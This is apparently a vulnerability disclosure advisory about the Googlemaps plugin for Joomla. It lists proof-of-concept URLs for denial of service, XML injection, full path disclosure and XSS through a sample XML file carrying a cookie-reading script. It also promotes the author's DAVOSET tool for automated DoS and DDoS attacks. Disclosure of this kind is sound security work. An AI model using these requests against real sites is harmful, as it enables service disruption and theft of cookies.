SecurityvulnsSECURITYVULNS:DOC:29645Multiple vulnerabilities in Googlemaps plugin for Joomla
Hello 3APA3A!
These are Denial of Service, XML Injection, Cross-Site Scripting and Full path disclosure vulnerabilities in Googlemaps plugin for Joomla.
Affected products:
Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and potentially previous versions. In new version of DAVOSET I'll add a lot of web sites with Googlemaps plugin.
Affected vendors:
Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147
Details:
Denial of Service (WASC-10):
http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file
Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
XML Injection (WASC-23):
http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml
It's possible to include external xml-files. Which also can be used for XSS attack:
XSS via XML Injection (WASC-23):
http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml
File xss.xml:
<?xml version="1.0" encoding="utf-8"?>
<feed>
<title>XSS</title>
<entry>
<div xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
</entry>
</feed>
Cross-Site Scripting (WASC-08):
Full path disclosure (WASC-13):
http://site/plugins/content/plugin_googlemap2_proxy.php
Besides plugin_googlemap2_proxy.php, also happens plugin_googlemap3_proxy.php (but it has other path at web sites).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua